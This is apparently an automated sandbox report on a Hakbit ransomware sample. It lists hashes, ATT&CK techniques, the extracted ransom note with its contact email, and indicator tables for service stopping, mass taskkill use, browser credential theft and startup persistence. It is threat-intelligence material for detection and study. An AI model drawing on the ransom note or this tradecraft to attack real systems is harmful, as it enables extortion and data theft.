hakbit | 38bc13ef112b2f17d4d1a80243fac6a521b5d58228984aae0752d79487fa3b66

Resubmissions

16/04/2025, 11:04

250416-m58gsaz1ay 10

15/04/2025, 17:34

15/04/2025, 06:16

14/04/2025, 08:06

14/04/2025, 07:59

14/04/2025, 07:22

14/04/2025, 07:16

11/04/2025, 21:39

Analysis

max time kernel
124s
max time network
130s
platform
windows11-21h2_x64
resource
win11-20250410-en
resource tags

arch:x64arch:x86image:win11-20250410-enlocale:en-usos:windows11-21h2-x64system
submitted
15/04/2025, 06:16

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
Size

80KB
MD5

8152a3d0d76f7e968597f4f834fdfa9d
SHA1

c3cf05f3f79851d3c0d4266ab77c8e3e3f88c73e
SHA256

69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b
SHA512

eb1a18cb03131466a4152fa2f6874b70c760317148684ca9b95044e50dc9cd19316d6e68e680ce18599114ba73e75264de5dab5afe611165b9c6c0b5f01002b4
SSDEEP

1536:SHbigeMiIeMfZ7tOBbFv0CIG0dDh/suIicRtpNf8SgRXt+AacRDVX8C4OntD4acN:SHbigeMiIeMfZ7tOBbFv0CIG0dDh/su0

Score

10^/10

hakbit credential_access defense_evasion discovery execution ransomware spyware stealer

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt

Family

hakbit

Ransom Note

To recover your data contact the email below [email protected] Key Identifier: olqrrANLKm5IrNUyvqF4ZSouKL3Rdr8oce5WsCHHg4+u0+Z+jk2CpOCWoB0CnTTtgtGfTmMYKFCgWxSvgu0XS3IXhQuzn9Z1KDpYTuOcXU3S5nQ6GUVvYtESrU/QhCuFk8R+JWA2kO10Ep/T4cvGXDWIa9+ke3b43DTralWfnfRUxdc+72vh7fV/JhvWZBokCj0uNYoIm6gw7fL80YHOoVSjNkwT+T8O5uF/sIrq6Z2pcSynqsDTLOX6VMZHIETYitUCmCVROx3xpGCizW2oV3tJUhvKeiAi+iSMxBAfKXFSKLmg0CScanenhkcxXrQJ3RAUJA8T3e+A7x6SGnExU+C+XrGJTq9x/9iO2OmJBvXcdeJMBoMVaoZt9slkOKjDjIK/IYwqRetayvhw4B201u+Pq2evo6wayGc61MH/MiF8NbOSaTp6ruJFnqqQ9Lmp2QPnhOB/gTd0cjs+t0J0AVs2b7es5hbTLMlkes0bnjcvNN3Kjbgh/psuUe4RXsHgHWPcdoxLLitwEHATSSlmHHKXGlacBuE9CZN55KNc6bGiPj0gQHab8izFaJzuB/PjhDfhJcu7jXDoPmQ1JLp35ZHNA4yUDsfhG3cde2tCTIoD4QMmZQsiIEgqFpd/82vGxVr5zoy1wIagGlNdyA0nsjnRJh8qPuaNNrubnE+Dwas= Number of files that were processed is: 444

Emails

[email protected]

Signatures

Disables service(s) 3 TTPs
defense_evasion execution

Windows Service
T1543.003

Service Stop
T1489

Service Execution
T1569.002
Hakbit
Ransomware which encrypts files using AES, first seen in November 2019.
ransomware hakbit
Hakbit family
hakbit
Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
credential_access stealer

Windows Credential Manager
T1555.004

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2504	sc.exe
412	sc.exe
5592	sc.exe
5612	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4208	cmd.exe
6556	PING.EXE

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	SearchHost.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	SearchHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	SearchHost.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	SearchHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	SearchHost.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	SearchHost.exe

Kills process with taskkill 47 IoCs

defense_evasion

pid	Process
4876	taskkill.exe
4904	taskkill.exe
4768	taskkill.exe
1636	taskkill.exe
2612	taskkill.exe
2616	taskkill.exe
5840	taskkill.exe
5024	taskkill.exe
4908	taskkill.exe
3316	taskkill.exe
3152	taskkill.exe
5136	taskkill.exe
5040	taskkill.exe
4872	taskkill.exe
4384	taskkill.exe
3400	taskkill.exe
4600	taskkill.exe
2092	taskkill.exe
3768	taskkill.exe
6080	taskkill.exe
1112	taskkill.exe
2072	taskkill.exe
1836	taskkill.exe
4832	taskkill.exe
4808	taskkill.exe
4796	taskkill.exe
1500	taskkill.exe
2132	taskkill.exe
5888	taskkill.exe
5600	taskkill.exe
3148	taskkill.exe
5320	taskkill.exe
4640	taskkill.exe
2684	taskkill.exe
4892	taskkill.exe
4544	taskkill.exe
4048	taskkill.exe
5832	taskkill.exe
2788	taskkill.exe
648	taskkill.exe
5032	taskkill.exe
4920	taskkill.exe
4752	taskkill.exe
2236	taskkill.exe
4784	taskkill.exe
3388	taskkill.exe
2372	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 3 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Internet Explorer\GPU	SearchHost.exe
Key created	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Internet Explorer\GPU	SearchHost.exe
Key created	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Internet Explorer\GPU	SearchHost.exe

Modifies data under HKEY_USERS 15 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "159"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365268"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = 99ebff004cc2ff000091f8000078d4000067c000003e9200001a6800f7630c00	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4290799360"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365268"	LogonUI.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\EdpDomStorage	SearchHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "1855"	SearchHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "3882"	SearchHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	SearchHost.exe
Key created	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com	SearchHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "165"	SearchHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "28835"	SearchHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "13434"	SearchHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "888"	SearchHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "5498"	SearchHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "27943"	SearchHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	SearchHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "132"	SearchHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "1132"	SearchHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "4531"	SearchHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "27943"	SearchHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	SearchHost.exe
Key created	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com	SearchHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "132"	SearchHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "7417"	SearchHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "4849"	SearchHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "4614"	SearchHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	SearchHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	SearchHost.exe
Key created	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total	SearchHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	SearchHost.exe
Key created	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total	SearchHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "29802"	SearchHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "8384"	SearchHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "5581"	SearchHost.exe
Key created	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage	SearchHost.exe
Key created	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\bing.com	SearchHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "28389"	SearchHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "28389"	SearchHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "7417"	SearchHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "932"	SearchHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "4614"	SearchHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "4621"	SearchHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "132"	SearchHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "132"	SearchHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "1132"	SearchHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "28835"	SearchHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	SearchHost.exe
Key created	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DomStorageState	SearchHost.exe
Key created	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\www.bing.com	SearchHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	SearchHost.exe
Key created	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DomStorageState	SearchHost.exe
Key created	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total	SearchHost.exe
Key created	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\MuiCache	SearchHost.exe
Key created	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DomStorageState	SearchHost.exe
Key created	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\bing.com	SearchHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "1099"	SearchHost.exe
Key created	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\www.bing.com	SearchHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "1099"	SearchHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "12467"	SearchHost.exe
Key created	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com	SearchHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "132"	SearchHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "165"	SearchHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "165"	SearchHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "932"	SearchHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "4621"	SearchHost.exe
Key created	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com	SearchHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "165"	SearchHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "29356"	SearchHost.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
3368	notepad.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
6556	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
